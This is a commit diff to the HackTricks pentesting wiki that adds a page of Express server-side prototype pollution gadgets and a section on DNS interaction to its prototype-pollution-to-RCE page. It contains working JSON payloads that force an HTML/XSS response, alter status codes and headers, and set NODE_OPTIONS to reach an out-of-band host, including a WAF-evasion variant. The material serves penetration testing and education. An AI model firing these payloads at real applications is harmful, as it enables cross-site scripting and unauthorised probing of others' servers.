GITBOOK-3796: No subject

2023-03-01 10:14:57 +00:00 · 2023-03-01 10:14:57 +00:00 · 4ced3c152d
commit 4ced3c152d
parent 614f7bbe30
3 changed files with 171 additions and 0 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -484,6 +484,7 @@
 * [Deserialization](pentesting-web/deserialization/README.md)
  * [NodeJS - \_\_proto\_\_ & prototype Pollution](pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md)
    * [Client Side Prototype Pollution](pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md)
+    * [Express Prototype Pollution Gadgets](pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md)
    * [Prototype Pollution to RCE](pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md)
  * [Java JSF ViewState (.faces) Deserialization](pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md)
  * [Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner](pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md)
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@ -0,0 +1,143 @@
+# Express Prototype Pollution Gadgets
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+## Serve XSS responses
+
+### Change JSON content-type to HTML
+
+In an Express app using a **JSON content type response** and reflecting a JSON:
+
+```javascript
+app.use(bodyParser.json({type: 'application/json'}));
+app.post('/', function(req, res){
+    _.merge({}, req.body);
+   res.send(req.body);
+});
+```
+
+In these cases XSS isn't normally possible with a JSON content type. However, with prototype pollution we can **confuse Express to serve up an HTML response.** This vulnerability relies on the application using **`res.send(obj)`** and using the body parser with the application/json content type.
+
+```json
+{"__proto__":{"_body":true,"body":"<script>evil()"}}
+```
+
+By **polluting** both the **`body`** and **`_body`** properties, it's possible to cause **Express to serve up the HTML content type** and reflect the `_body` property, resulting in stored XSS.
+
+### Render UTF7
+
+It's possible to make express **render UTF-7 content with**:
+
+```json
+{"__proto__":{"content-type": "application/json; charset=utf-7"}}
+```
+
+## Safe Scanning Techinques
+
+### JSON spaces
+
+The following PP will make attributes inside a JSON to have an extra space which won't break the functionality:
+
+```json
+{"__proto__":{"json spaces": " "}}
+```
+
+Then a reflected JSON will looks like:
+
+```json
+{"foo":  "bar"} -- Note the extra space
+```
+
+### Exposed Headers
+
+The following PP gadget will make the server send back the HTTP header: **`Access-Control-Expose_headers: foo`**
+
+```json
+{"__proto__":{"exposedHeaders":["foo"]}}
+```
+
+It requires the **CORS module to be installed**
+
+### **OPTIONS Method**
+
+With the following payload, it's possible to **hide a method from an OPTIONS response**:
+
+```javascript
+// Original reponse: POST,GET,HEAD
+
+// Payload:
+{"__proto__":{"head":true}}
+
+//New response: POST;GET
+```
+
+### **Status**
+
+It's possible to change the **returned status code** using the following PP payload:
+
+```json
+{"__proto__":{"status":510}}
+```
+
+### Error
+
+When you assign to a prototype with a primitive such as a string, it produces a **no-op operation since the prototype has to be an object**. If you attempt to assign a prototype object to the `Object.prototype` itself, this will **throw an exception**. We can use these two behaviours to **detect if prototype pollution was successful**:
+
+```javascript
+({}).__proto__.__proto__={}//throws type exception
+({}).__proto__.__proto__="x"//no-op does not throw exception
+```
+
+### Reflected Value
+
+If the application is reflecting an object in the response you could just create an attribute with a **weird name and the `__proto__` one** and if **only the weird one is reflected** is possible that the web is vulnerable:
+
+```json
+{"hacktricks":"rocks","__proto__":"test"}
+```
+
+Or if Lodash or similar library is used, you can **set a property via PP and inside the object** and if that property is not reflected is because Lodash looks at the current object to see if the property already exists in the merged object:
+
+```javascript
+{"__proto__":{"a":"asd"},"a":"asd2","b":"dfg"}
+// If only b is reflected then PP in Lodash
+```
+
+## Misc
+
+### Allow Dots
+
+There is an option in Express that allows you to **create objects from query string parameters**.\
+You could definitely use it in a bug **chain** to exploit a **prototype pollution vulnerability**.
+
+```json
+{"__proto__":{"allowDots":true}}
+```
+
+**`?foo.bar=baz` create an object in Node.**
+
+## References
+
+* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@ -166,6 +166,32 @@ var proc = fork('a_file.js');
 ```
 {% endcode %}

+## DNS Interaction
+
+Using the following payloads it's possible to abuse the NODE\_OPTIONS env var we have discussed previously and detect if it worked with a DNS interaction:
+
+```json
+{
+  "__proto__": {
+    "argv0":"node",
+    "shell":"node",
+    "NODE_OPTIONS":"--inspect=id.oastify.com"
+  }
+}
+```
+
+Or, to avoid WAFs asking for the domain:
+
+```json
+{
+  "__proto__": {
+    "argv0":"node",
+    "shell":"node",
+    "NODE_OPTIONS":"--inspect=id\"\".oastify\"\".com"
+  }
+}
+```
+
 ## PP2RCE vuln child\_process functions

 In this section where are going to analyse **each function from `child_process`** to execute code and see if we can use any technique to force that function to execute code:
@ -671,6 +697,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
 * [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
 * [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/)
 * [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)
+* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)

 <details>